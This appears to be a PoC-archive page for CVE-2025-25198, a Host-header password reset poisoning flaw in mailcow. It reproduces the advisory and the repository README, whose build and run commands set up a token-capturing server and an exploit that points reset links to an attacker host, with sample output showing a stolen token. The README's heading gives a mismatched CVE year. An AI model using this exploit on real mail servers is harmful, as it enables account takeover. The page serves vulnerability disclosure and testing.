Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-25198 PoC — mailcow: dockerized vulnerable to password reset poisoning

Source
https://github.com/enzocipher/CVE-2025-25198
Associated Vulnerability
Title:mailcow: dockerized vulnerable to password reset poisoning (CVE-2025-25198)
Description:mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the `Host HTTP` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link. Version 2025-01a contains a patch. As a workaround, deactivate the password reset functionality by clearing `Notification email sender` and `Notification email subject` under System -> Configuration -> Options -> Password Settings.
Description
Captures password reset tokens from Mailcow Host header injection attacks.
Readme
# CVE-2024-25198

mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the `Host HTTP` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link. 

## How works?
Sets up an https server to hear al requests and sends a POST Request to the website with the Host header with your selected <IP>. You can also use Burpsuite to send the request and get the Token in the server.

## Features

- HTTPS server that retrieves the Password Change Token
- Exploit script that attacks the website vulnerability.
- Fixed Everything and no longer requires openssl to work 

## Prerequisites

- Go 1.16 or higher

## Server Script

```bash
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
```

## Exploit Script
```bash
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <user@email.com> --host <ip>:<port>  <--insecure | optional >
```

After waiting a bit the server will output the token that you can use :
```
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
```
File Snapshot

 [4.0K]  /data/pocs/4a915987eaba4aa9effb16c7f177963129db0b2c
├── [3.4K]  exploit.go
├── [1.0K]  LICENSE
├── [1.3K]  README.md
└── [5.6K]  server.go

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →